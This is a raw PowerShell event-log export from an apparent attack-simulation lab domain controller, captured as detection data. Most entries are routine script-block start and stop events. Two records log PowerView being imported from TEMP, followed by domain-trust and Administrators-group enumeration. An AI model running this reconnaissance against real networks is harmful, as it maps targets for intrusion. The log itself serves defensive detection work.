Message=Started invocation of ScriptBlock ID: 8b8d9ce5-9bbc-4943-9d8c-87bf66498064
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477840
Keywords=None
Message=Started invocation of ScriptBlock ID: 1a524875-4ae2-4df9-b553-223ddaf8a6cb
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1477839
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{Import-Module "$env:TEMP\PowerView.ps1"
Get-NetDomainTrust
Get-NetForestTrust
Get-ADDomain
Get-ADGroupMember Administrators -Recursive}

ScriptBlock ID: 1a524875-4ae2-4df9-b553-223ddaf8a6cb
Path:
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477838
Keywords=None
Message=Started invocation of ScriptBlock ID: 955a9871-e401-4166-a549-d7e044630cd5
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1477837
Keywords=None
Message=Creating Scriptblock text (1 of 1):
& {Import-Module "$env:TEMP\PowerView.ps1"
Get-NetDomainTrust
Get-NetForestTrust
Get-ADDomain
Get-ADGroupMember Administrators -Recursive}

ScriptBlock ID: 955a9871-e401-4166-a549-d7e044630cd5
Path:
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40962
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Stop
RecordNumber=1477836
Keywords=None
Message=PowerShell console is ready for user input
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1477835
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 8148 in AppDomain: DefaultAppDomain.
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1477834
Keywords=None
Message=PowerShell console is starting up
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477833
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477832
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477831
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477830
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477829
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478048
Keywords=None
Message=Started invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478047
Keywords=None
Message=Completed invocation of ScriptBlock ID: f4dc6e14-40bc-4521-bf15-94d0ec377f1b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478046
Keywords=None
Message=Completed invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478045
Keywords=None
Message=Started invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478044
Keywords=None
Message=Started invocation of ScriptBlock ID: f4dc6e14-40bc-4521-bf15-94d0ec377f1b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478043
Keywords=None
Message=Creating Scriptblock text (1 of 1):
prompt

ScriptBlock ID: f4dc6e14-40bc-4521-bf15-94d0ec377f1b
Path:
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478042
Keywords=None
Message=Completed invocation of ScriptBlock ID: ca06aa1b-177a-4689-9498-1195c0905ec9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478041
Keywords=None
Message=Started invocation of ScriptBlock ID: ca06aa1b-177a-4689-9498-1195c0905ec9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478040
Keywords=None
Message=Completed invocation of ScriptBlock ID: 582fc7cf-f6b7-4da1-9e23-cc924416f8ba
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478039
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9977b850-34e8-42e4-a697-d3c6bfbce619
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478038
Keywords=None
Message=Completed invocation of ScriptBlock ID: d0701c1a-1fc1-42c2-8856-836216e43540
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478037
Keywords=None
Message=Completed invocation of ScriptBlock ID: c8254d99-237d-4863-87bb-0028356dd4a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478036
Keywords=None
Message=Started invocation of ScriptBlock ID: c8254d99-237d-4863-87bb-0028356dd4a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478035
Keywords=None
Message=Completed invocation of ScriptBlock ID: 38dbedb2-6aa1-4f65-9bbe-36c2e31a322c
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478034
Keywords=None
Message=Started invocation of ScriptBlock ID: 38dbedb2-6aa1-4f65-9bbe-36c2e31a322c
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478033
Keywords=None
Message=Completed invocation of ScriptBlock ID: 09b14349-c1b3-400b-82ec-b469daf1f080
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478032
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478031
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478030
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478029
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478028
Keywords=None
Message=Started invocation of ScriptBlock ID: 09b14349-c1b3-400b-82ec-b469daf1f080
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478027
Keywords=None
Message=Started invocation of ScriptBlock ID: d0701c1a-1fc1-42c2-8856-836216e43540
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478026
Keywords=None
Message=Completed invocation of ScriptBlock ID: b5c66ef7-f75f-4763-a002-15bb79633869
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478025
Keywords=None
Message=Started invocation of ScriptBlock ID: b5c66ef7-f75f-4763-a002-15bb79633869
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478024
Keywords=None
Message=Completed invocation of ScriptBlock ID: d0701c1a-1fc1-42c2-8856-836216e43540
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478023
Keywords=None
Message=Completed invocation of ScriptBlock ID: c8254d99-237d-4863-87bb-0028356dd4a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478022
Keywords=None
Message=Started invocation of ScriptBlock ID: c8254d99-237d-4863-87bb-0028356dd4a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478021
Keywords=None
Message=Completed invocation of ScriptBlock ID: 38dbedb2-6aa1-4f65-9bbe-36c2e31a322c
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478020
Keywords=None
Message=Started invocation of ScriptBlock ID: 38dbedb2-6aa1-4f65-9bbe-36c2e31a322c
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478019
Keywords=None
Message=Completed invocation of ScriptBlock ID: 09b14349-c1b3-400b-82ec-b469daf1f080
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478018
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478017
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478016
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478015
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478014
Keywords=None
Message=Started invocation of ScriptBlock ID: 09b14349-c1b3-400b-82ec-b469daf1f080
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478013
Keywords=None
Message=Started invocation of ScriptBlock ID: d0701c1a-1fc1-42c2-8856-836216e43540
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478012
Keywords=None
Message=Completed invocation of ScriptBlock ID: b5c66ef7-f75f-4763-a002-15bb79633869
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478011
Keywords=None
Message=Started invocation of ScriptBlock ID: b5c66ef7-f75f-4763-a002-15bb79633869
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478010
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478009
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478008
Keywords=None
Message=Completed invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478007
Keywords=None
Message=Started invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478006
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
